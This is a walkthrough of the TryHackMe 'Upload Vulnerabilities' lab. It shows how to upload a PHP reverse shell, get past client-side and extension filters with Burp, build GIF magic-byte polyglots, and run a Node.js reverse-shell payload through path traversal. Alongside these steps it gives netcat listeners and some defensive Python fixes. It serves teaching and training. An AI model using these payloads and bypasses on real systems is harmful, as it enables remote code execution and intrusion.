The Dutch Hacker
Upload Vulnerabilities

Upload Vulnerabilities on Tryhackme

This is the write-up for the room Upload Vulnerabilities on TryHackMe. The room is part of the Web Fundamentals path.

Connect to the VPN, or use the AttackBox on the TryHackMe site, to reach the TryHackMe lab environment.

TASKS Upload Vulnerabilities

Task 1

Follow along with this task. It is self-explanatory, but do not skip it: without the hosts entries you will not be able to reach the machines in the rest of this room.

It is only one command you need to enter in the terminal (replace MACHINE_IP with the IP of your deployed machine):

echo "<MACHINE_IP>    overwrite.uploadvulns.thm shell.uploadvulns.thm java.uploadvulns.thm annex.uploadvulns.thm magic.uploadvulns.thm jewel.uploadvulns.thm" | sudo tee -a /etc/hosts

To revert, delete that line again. The command below removes the last line of /etc/hosts, so run it only while the entry you added is still the last line:

sudo sed -i '$d' /etc/hosts

Task 2

Read all that is in this task and press complete

Task 3

Read all that is in this task and press complete

Task 4

Read all that is in this task

4.1 What is the name of the image file which can be overwritten?

Open the website http://overwrite.uploadvulns.thm/

Right-click the image and choose View Image Info; the filename is shown there.

4.2 Overwrite the image. What is the flag you receive?

Now upload a file of your own called mountains.jpg. The server stores uploads under the filename the client supplies and does not check whether that name is already taken, so the original image is overwritten and the flag is shown.
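The overwrite works because the server saves the upload under the name the client chose. As an added example, not code from the room or from this write-up, here is that behaviour in Python next to a version that cannot clobber anything: the upload directory, the filename mountains.jpg and the sample bytes are constructed for the demo.

```python
import os
import secrets
import tempfile

# Constructed sample data for this example (not the room's files):
# the image already on the server, and what the attacker uploads
# under the very same name.
ORIGINAL_IMAGE = b"\xff\xd8\xff\xe0 original mountains.jpg bytes"
ATTACKER_UPLOAD = b"attacker-controlled bytes"


def store_upload_unsafe(upload_dir, client_name, data):
    """What the overwrite server does: trust the client's filename and
    write over anything that already has that name."""
    path = os.path.join(upload_dir, client_name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def store_upload_safe(upload_dir, client_name, data):
    """Throw the client's name away: keep only its extension, choose a
    random base name, and open with O_EXCL so an existing file is never
    truncated. Validating the extension itself is a separate check and
    is not shown here."""
    ext = os.path.splitext(os.path.basename(client_name))[1].lower()
    for _ in range(5):  # a collision on 16 random hex chars is unrealistic
        path = os.path.join(upload_dir, secrets.token_hex(8) + ext)
        try:
            fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
        except FileExistsError:
            continue
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        return path
    raise RuntimeError("could not allocate a unique filename")


def demo(storer):
    """Seed a temporary upload directory with mountains.jpg, run one of the
    storers with a same-named upload, and report whether the original
    survived and under which name the upload was stored."""
    with tempfile.TemporaryDirectory() as upload_dir:
        existing = os.path.join(upload_dir, "mountains.jpg")
        with open(existing, "wb") as fh:
            fh.write(ORIGINAL_IMAGE)
        stored = storer(upload_dir, "mountains.jpg", ATTACKER_UPLOAD)
        with open(existing, "rb") as fh:
            original_intact = fh.read() == ORIGINAL_IMAGE
        return {
            "stored_as": os.path.basename(stored),
            "original_intact": original_intact,
        }


if __name__ == "__main__":
    print("unsafe:", demo(store_upload_unsafe))
    print("safe:  ", demo(store_upload_safe))
```

The unsafe storer reports the original as gone and the upload stored as mountains.jpg; the safe one leaves the original intact and stores the upload under a random name with the .jpg extension.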

Task 5

Read all that is in the task

Navigate to shell.uploadvulns.thm and complete the questions for this task.

5.1 Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads? (N.B. This is a good habit to get into, and will serve you well in the upcoming tasks…)

First we run gobuster:

gobuster dir -u http://shell.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Type the command in rather than copying it from the page; copied text sometimes gives errors (the dashes, for instance, may not survive as plain ASCII).

Now upload a file so we can see where it ends up (select the file, then press Upload). I uploaded mountains.jpg.

And we see it in the resources directory.

5.2 Get either a web shell or a reverse shell on the machine.
What’s the flag in the /var/www/ directory of the server?

Let's go for a reverse shell.

First we need a suitable shell. Kali ships with pentestmonkey's php-reverse-shell.php, so copy it and edit the copy, leaving the original as it is:

cp /usr/share/webshells/php/php-reverse-shell.php ~/Downloads/shell.php
cd ~/Downloads/
nano shell.php

Now change $ip to your tun0 IP.

Leave $port as it is (the script defaults to 1234, which is the port the listener below uses). Press Ctrl+X, then Y, to save and exit.

Start a listener on that port:

nc -nlvp 1234

Now upload shell.php and check the resources page: there is no filtering at all on this site, so the PHP file is stored under the web root as-is.

Click the file and go back to the terminal where the listener is running: requesting the file makes the server execute it, and the connection comes in.

And we have a shell.

now type in

cd /var/www
ls
cat flag.txt

Task 6

Read all that is in the task.

6.1 What is the traditional server-side scripting language?

Answer: php

6.2 When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?

Answer: whitelist (also called an allowlist)

6.3 [Research] What MIME type would you expect to see when uploading a CSV file?

You can reason this one out: a CSV file is plain text that many different programs can read, so its MIME type lives in the text/ family.

Answer: text/csv

Task 7

Read all that is in the task

7.1 What is the flag in /var/www/?

If you want to scan with gobuster first, you can:

gobuster dir -u http://java.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This reveals the images and assets directories.

We will reuse the shell.php from the previous task.

Start Burp Suite and turn Intercept on. Follow this guide if you do not know how to configure Firefox with Burp: Configure Burpsuite with Firefox

Now navigate to http://java.uploadvulns.thm/ with Intercept on; Burp catches the request for the page.

Right-click the request and choose Do intercept -> Response to this request, then press Forward.

In the response, delete the client-side filter (the JavaScript that rejects anything without an image extension before the upload is ever sent) and press Forward.

Now go back to the site and upload shell.php.

Once you see the upload request in Burp you can turn Intercept off, or keep pressing Forward until the page reports a successful upload. The filter only ever ran in the browser; the server never checked the file.


Now start a listener in a terminal:

nc -nlvp 1234

Then go to the images directory we found and click shell.php:

http://java.uploadvulns.thm/images/

When the listener connects, read the flag:

cat /var/www/flag.txt

Task 8

Read all that is in the task

8.1 What is the flag in /var/www/?

First we run gobuster:

gobuster dir -u http://annex.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Among the results is a privacy directory.

Use the select command to pick a file and then type upload to send it. shell.php is rejected as invalid, so we open the wiki page the task links to and collect the other PHP file extensions we can try.

Renaming shell.php to shell.php5 and uploading it again succeeds: the filter is a denylist that only knows about .php, while the web server still hands .php5 to the PHP interpreter.

The server also renames the file on upload. Now start a listener:

nc -nlvp 1234

Click the .php5 file in the privacy directory and the shell arrives at the listener.

Read the flag:

cat /var/www/flag.txt
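Tasks 6 to 8 turn on one distinction: an allowlist (the Task 6 answer) names the few extensions the server accepts, a denylist (what annex uses) names the ones it rejects, and a check that only runs in the browser (Task 7) protects nothing once the request is sent from Burp. The following Python is an added example, not part of the room or of this write-up; it models the three checks and lists which attacker-chosen names get through each one. The extension sets and candidate names are constructed for the example, and whether a server actually executes .php5 or .phtml depends on its handler configuration.

```python
from pathlib import PurePosixPath

# Constructed filters for this example, not the room's server code.
# A denylist names what is rejected; an allowlist names what is accepted.
DENYLIST = {".php"}
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif"}

# Alternative PHP extensions from the Wikipedia list the write-up uses.
# Whether the web server executes each of them depends on its handler
# configuration (for Apache, the AddHandler/AddType lines); annex ran .php5.
PHP_EXTENSIONS = [".php", ".php3", ".php4", ".php5", ".php7",
                  ".phtml", ".phar", ".phps"]


def extension_of(filename):
    """Last extension, lower-cased so shell.PHP is treated as shell.php."""
    return PurePosixPath(filename).suffix.lower()


def denylist_allows(filename):
    """Reject only what is explicitly listed; everything else passes."""
    return extension_of(filename) not in DENYLIST


def allowlist_allows(filename):
    """Accept only what is explicitly listed; everything else is rejected."""
    return extension_of(filename) in ALLOWLIST


def client_side_only_allows(filename):
    """A check that lives only in the browser's JavaScript is no check at
    all for a request sent from Burp or curl: the server sees every name."""
    return True


def uploadable_names(check):
    """Candidate names an attacker would try, filtered through `check`."""
    candidates = ["shell" + ext for ext in PHP_EXTENSIONS]
    candidates += ["shell.PHP", "shell.jpg.php", "shell.php.jpg"]
    return [name for name in candidates if check(name)]


if __name__ == "__main__":
    for name, check in [("denylist", denylist_allows),
                        ("allowlist", allowlist_allows),
                        ("client-side only", client_side_only_allows)]:
        print(f"{name}: {uploadable_names(check)}")
```

The denylist lets every alternative spelling through, including shell.php5; the allowlist lets through only shell.php.jpg, which is harmless unless the server is misconfigured to run files with a .php segment anywhere in the name; the client-side-only check lets everything through.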

Task 9

9.1 Grab the flag from /var/www/

First we run a gobuster scan:

gobuster dir -u http://magic.uploadvulns.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The graphics directory returns 403 Forbidden: directory listing is disabled, but files inside it can still be requested by name.

Now we try to upload shell.php and get an error: the server only wants GIF files. Let's see whether the magic-number trick works here, that is, whether the server decides the file type from the first bytes of the file rather than from the extension.

First make a copy of shell.php, in case we need to revert. I will copy it to magic.php:

cp shell.php magic.php

The signatures are listed on Wikipedia: List of file signatures – Wikipedia

For GIF there are two:

47 49 46 38 37 61 (GIF87a)
47 49 46 38 39 61 (GIF89a)

Either signature is 6 bytes long. Open magic.php in nano and add six placeholder characters, AAAAAA, at the very start of the file, before the opening <?php tag (PHP echoes bytes outside the tags as plain text, so the script still runs):

nano magic.php

Save the file, then open it in a hex editor:

hexeditor magic.php

Now change those six bytes to one of the signatures found above, for example 47 49 46 38 39 61.

Now upload this file; the server accepts it because the first six bytes say GIF, even though the extension is still .php.

Start a listener:

nc -nlvp 1234

Directory listing is off on the server, so request the file by name:

http://magic.uploadvulns.thm/graphics/magic.php

When the shell arrives:

cat /var/www/flag.txt
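The same header can be produced without a hex editor, and the check it defeats is easy to model. The Python below is an added example, not the room's code or the write-up's; it prepends the GIF signature to a constructed stand-in for the PHP source, reproduces the write-up's placeholder-then-overwrite route, and runs both through the kind of six-byte validator magic.uploadvulns.thm uses. Any PHP source works the same way, because the interpreter only acts on text between <?php and ?> and echoes the header bytes literally.

```python
# Signatures from the Wikipedia list of file signatures the write-up uses.
GIF87A = bytes.fromhex("47 49 46 38 37 61")  # b"GIF87a"
GIF89A = bytes.fromhex("47 49 46 38 39 61")  # b"GIF89a"

# Constructed stand-in for the reverse-shell source used in the write-up.
PHP_PAYLOAD = b"<?php echo 'still executed as PHP'; ?>\n"


def looks_like_gif(data):
    """The kind of check the magic server performs: compare the first six
    bytes against the known signatures and look at nothing else, not even
    the extension."""
    return data[:6] in (GIF87A, GIF89A)


def make_gif_polyglot(php_source, signature=GIF89A):
    """Prepend the signature. A magic-byte validator now sees a GIF, while
    a server that runs the file as PHP prints the six header bytes and then
    executes the script that follows."""
    return signature + php_source


def patch_placeholder(data, signature=GIF89A):
    """The write-up's hex-editor route: six 'A' bytes are typed in first,
    then overwritten in place with the signature bytes."""
    if data[:6] != b"AAAAAA":
        raise ValueError("expected six placeholder bytes at offset 0")
    return signature + data[6:]


def build_file(src_path, dst_path, signature=GIF89A):
    """Read a PHP file, write the polyglot next to it, return its bytes."""
    with open(src_path, "rb") as fh:
        polyglot = make_gif_polyglot(fh.read(), signature)
    with open(dst_path, "wb") as fh:
        fh.write(polyglot)
    return polyglot


if __name__ == "__main__":
    print("raw PHP passes magic check:", looks_like_gif(PHP_PAYLOAD))
    print("polyglot passes magic check:",
          looks_like_gif(make_gif_polyglot(PHP_PAYLOAD)))
```

build_file("shell.php", "magic.php") produces exactly the bytes the nano-plus-hexeditor session in the write-up produces. The caveat for defenders is the flip side: a signature check proves only that the first bytes match, so it has to be combined with an extension allowlist, a safe storage name, and a location the web server will never execute.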

Task 10

Read all that is in the task and press complete

Task 11

11. Hack the machine and grab the flag from /var/www/

OK, now for the fun part.

Run gobuster first.

Now go to jewel.uploadvulns.thm.

Let's try to upload a file: it tells us it wants a JPG.

Looking at the page source we see upload.js; opening it reveals the client-side filters.

We will bypass this client-side filter, and there is probably a server-side one as well, but first let's analyse the web page with Wappalyzer.

It is Node.js, which means the PHP reverse shell from the previous tasks will not run here.

PayloadsAllTheThings has a Node.js payload we can use:

PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings · GitHub

Payload

(function(){
    // Spawn a shell and connect a TCP socket back to the listener
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(443, "10.0.0.1", function(){
        // Wire the socket to the shell's stdin/stdout/stderr
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();

Save this as shell.js; change 10.0.0.1 to your tun0 IP and keep port 443.

Now we need to get past the client-side filter in upload.js before anything can be uploaded.

Start Burp Suite and turn Intercept on.

Reload the page with Ctrl+F5 so the browser fetches upload.js again instead of using its cached copy.

In Burp, forward until you see the request for upload.js. If it never appears, go to Proxy -> Options and untick the file-extension rule under Intercept Client Requests: by default Burp does not intercept requests for .js and image files.

Intercept the response to that request and click Forward until the JavaScript itself is shown.

Delete the highlighted filter functions and press Forward.

Uploading shell.js still returns "invalid format", so the server checks as well. Rename the file to shell.jpg and try again; this time it is accepted.


Now we need to find where the file is stored so we can run it.

gobuster found an admin page. Navigating to it shows a form that loads a module by name, and it tells us which directory the modules live in.

This is probably where we need to trigger execution from. Download the wordlist attached to the task and use it with gobuster against the directories we found.

Our file must be in one of them, so upload the file again and rerun gobuster.

Now we know where the file is: uploads are renamed on the server, here to AZC.jpg. Next we need a way to execute it.

First start a listener on port 443 in a terminal:

nc -nlvp 443

Go back to the admin page and enter the file name AZC.jpg.

Open Burp and intercept that request.

Submit the admin form again, and this time edit the module name in the intercepted request so that it goes up one directory and into the content directory where the upload lives (../content/AZC.jpg). The server loads that path as a module, and Node runs the JavaScript inside it regardless of the .jpg extension.

Go back to the terminal where the listener was started: the shell is there.

Read the flag:

cat /var/www/flag.txt
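The last step works because the admin page builds a file path from user input and then loads whatever that path points at (Node's require() compiles a file with an unrecognised extension as JavaScript, so the .jpg name does not save it). As an added Python example, not the room's Node.js server code or anything from this write-up, here is the naive join next to a resolver that refuses any path escaping the modules directory; the directory layout and the AZC.jpg file are constructed in a temporary directory for the demo.

```python
import os
import tempfile


def naive_resolve(modules_dir, requested):
    """What the admin page appears to do: join the user-supplied module
    name onto the modules directory and load the result. '..' walks out."""
    return os.path.normpath(os.path.join(modules_dir, requested))


def contained_resolve(modules_dir, requested):
    """Resolve symlinks and '..' first, then insist the result is still
    inside modules_dir. Returns None for anything that escapes. The
    comparison is done on path components (commonpath), not on string
    prefixes, so a sibling called modules2 does not count as inside."""
    base = os.path.realpath(modules_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def demo():
    """Constructed layout mirroring the room: modules/ for plugins, content/
    for uploads. Returns what each resolver does with the traversal name."""
    with tempfile.TemporaryDirectory() as root:
        modules = os.path.join(root, "modules")
        content = os.path.join(root, "content")
        os.makedirs(modules)
        os.makedirs(content)
        upload = os.path.join(content, "AZC.jpg")
        with open(upload, "w") as fh:
            fh.write("// javascript smuggled inside a .jpg (constructed)\n")
        traversal = "../content/AZC.jpg"
        return {
            # the naive join lands on the upload in content/
            "naive_reaches_upload": os.path.realpath(
                naive_resolve(modules, traversal)) == os.path.realpath(upload),
            # the contained resolver refuses it outright
            "contained_blocks": contained_resolve(modules, traversal) is None,
            # but still serves a name that really is inside modules/
            "contained_allows_local": contained_resolve(modules, "helper.js")
            == os.path.join(os.path.realpath(modules), "helper.js"),
        }


if __name__ == "__main__":
    print(demo())
```

Even with containment, the admin page would still execute any file a user can place inside the modules directory, so the upload location and the module directory must never overlap, and the module name should ideally be matched against a fixed list rather than used as a path at all.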

Now we have completed this challenge and the room Upload Vulnerabilities. I must admit I did take a look at the hints. I was more stuck on Burp Suite to get the upload.js in order to bypass it. Clearing out the Firefox cache and turning off the file extensions in Burp did the trick.
